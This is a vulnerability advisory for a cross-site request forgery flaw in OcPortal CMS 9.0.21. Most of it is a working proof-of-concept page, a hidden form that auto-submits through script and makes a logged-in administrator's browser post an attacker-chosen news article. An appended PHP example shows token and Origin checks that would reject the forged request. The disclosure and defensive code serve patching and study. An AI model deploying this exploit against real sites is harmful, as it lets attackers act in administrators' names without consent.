OcPortal CMS 9.0.21 Cross-site Request Forgery (CSRF) Vulnerability

2015.12.21
Credit: Arjun Basnet
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-352

Proof of Concept Code
***************************

<!DOCTYPE html>
<html lang="en">
<head>
<title>OcPortal 9.0.21 CSRF Vulnerability POC</title>
</head>
<body>
<form action="http://localhost/ocportal/cms/index.php?page=cms_news&type=_ad&uploading=1" enctype="multipart/form-data" method="post" id="formid">
<input type="hidden" name="MAX_FILE_SIZE" value="16777216" />
<input type="hidden" name="file1" value="" />
<input type="hidden" name="tick_on_form__validated" value="0" />
<input type="hidden" name="label_for__allow_rating" value="Allow rating" />
<input type="hidden" name="f_face" value="/" />
<input type="hidden" name="require__author" value="1" />
<input type="hidden" name="label_for__title" value="Title" />
<input type="hidden" name="file" value="" />
<input type="hidden" name="label_for__meta_description" value="Concise description" />
<input type="hidden" name="require__meta_description" value="0" />
<input type="hidden" name="validated" value="1" />
<input type="hidden" name="label_for__meta_keywords[]1" value="Keywords" />
<input type="hidden" name="label_for__meta_keywords[]0" value="Keywords" />
<input type="hidden" name="meta_description" value="Attack_OcPortal" />
<input type="hidden" name="allow_comments" value="1" />
<input type="hidden" name="comcode__news" value="1" />
<input type="hidden" name="http_referer" value="http://localhost/ocportal/cms/index.php?page=cms_news&type=ad" />
<input type="hidden" name="author" value="Attack_OcPortal" />
<input type="hidden" name="pre_f_notes" value="1" />
<input type="hidden" name="post__is_wysiwyg" value="1" />
<input type="hidden" name="label_for__file" value="Image" />
<input type="hidden" name="comcode__title" value="1" />
<input type="hidden" name="require__news_category" value="0" />
<input type="hidden" name="allow_rating" value="1" />
<input type="hidden" name="tick_on_form__allow_rating" value="0" />
<input type="hidden" name="require__allow_comments" value="0" />
<input type="hidden" name="label_for__validated" value="Validated" />
<input type="hidden" name="label_for__notes" value="Notes" />
<input type="hidden" name="label_for__post" value="News article" />
<input type="hidden" name="meta_keywords[]" value="Attack_OcPortal" />
<input type="hidden" name="label_for__main_news_category" value="Main category" />
<input type="hidden" name="f_size" value="" />
<input type="hidden" name="require__allow_rating" value="0" />
<input type="hidden" name="label_for__author" value="Source" />
<input type="hidden" name="require__title" value="1" />
<input type="hidden" name="comcode__post" value="1" />
<input type="hidden" name="news" value="Attack_OcPortal" />
<input type="hidden" name="post" value="Attack_OcPortal" />
<input type="hidden" name="require__validated" value="0" />
<input type="hidden" name="news__is_wysiwyg" value="1" />
<input type="hidden" name="require__notes" value="0" />
<input type="hidden" name="label_for__allow_comments" value="Allow comments" />
<input type="hidden" name="posting_ref_id" value="13973" />
<input type="hidden" name="f_colour" value="" />
<input type="hidden" name="label_for__news" value="News summary" />
<input type="hidden" name="require__meta_keywords" value="0" />
<input type="hidden" name="notes" value="Attack_OcPortal" />
<input type="hidden" name="title" value="Attack_OcPortal" />
<input type="hidden" name="require__file" value="0" />
<input type="hidden" name="require__main_news_category" value="1" />
<input type="hidden" name="label_for__news_category" value="Secondary categories" />
<input type="hidden" name="main_news_category" value="7" />
</form>
<script>
document.getElementById('formid').submit();
</script>
</body>
</html>

Credits & Authors
**********************

Arjun Basnet from Cyber Security Works Pvt. Ltd. (http://cybersecurityworks.com)
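A server-side check that would reject the auto-submitted request above, added here as an example; it is not ocPortal code and not the vendor's fix. The `csrf_token` field, the function names, the action label and the sample values are assumptions made for illustration.

```php
<?php
// Added example (hypothetical names throughout, not taken from ocPortal).

// Per-session token: HMAC of the action label under a random secret that is
// kept in the server-side session and never sent to the browser.
function issue_csrf_token(string $session_secret, string $action): string {
    return hash_hmac('sha256', $action, $session_secret);
}

// Returns a rejection reason, or null when the POST may be processed.
function csrf_reject_reason(array $post, array $headers, string $session_secret,
                            string $action, string $site_origin): ?string {
    // The Origin header is set by the browser; a form field such as the PoC's
    // "http_referer" is chosen by whoever built the form and proves nothing.
    if (isset($headers['Origin']) && $headers['Origin'] !== $site_origin) {
        return 'cross-origin POST';
    }
    // Origin can be absent, so the token is required in every case.
    $sent = $post['csrf_token'] ?? '';
    if (!is_string($sent) || $sent === '') {
        return 'missing token';
    }
    // Constant-time comparison against the expected per-session value.
    if (!hash_equals(issue_csrf_token($session_secret, $action), $sent)) {
        return 'bad token';
    }
    return null;
}

// --- Constructed sample data ---
$secret = bin2hex(random_bytes(32));   // would live in the user's session
$action = 'cms_news:_ad';              // label for the "add news" action
$site   = 'http://localhost';

// Fields as sent by the PoC form: fixed values only, no per-session secret.
$forged = [
    'title'          => 'Attack_OcPortal',
    'posting_ref_id' => '13973',
    'http_referer'   => 'http://localhost/ocportal/cms/index.php?page=cms_news&type=ad',
];
// A form rendered by the site itself for this session.
$legit = ['title' => 'Release notes', 'csrf_token' => issue_csrf_token($secret, $action)];

var_dump(csrf_reject_reason($forged, ['Origin' => 'http://attacker.example'], $secret, $action, $site));
var_dump(csrf_reject_reason($forged, [], $secret, $action, $site));
var_dump(csrf_reject_reason($legit, ['Origin' => $site], $secret, $action, $site));
```

The first two calls return a rejection reason (foreign Origin, then missing token when no Origin header is sent); the third returns null because the token matches the session secret.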

References:

http://ocportal.com/tracker/view.php?id=2074

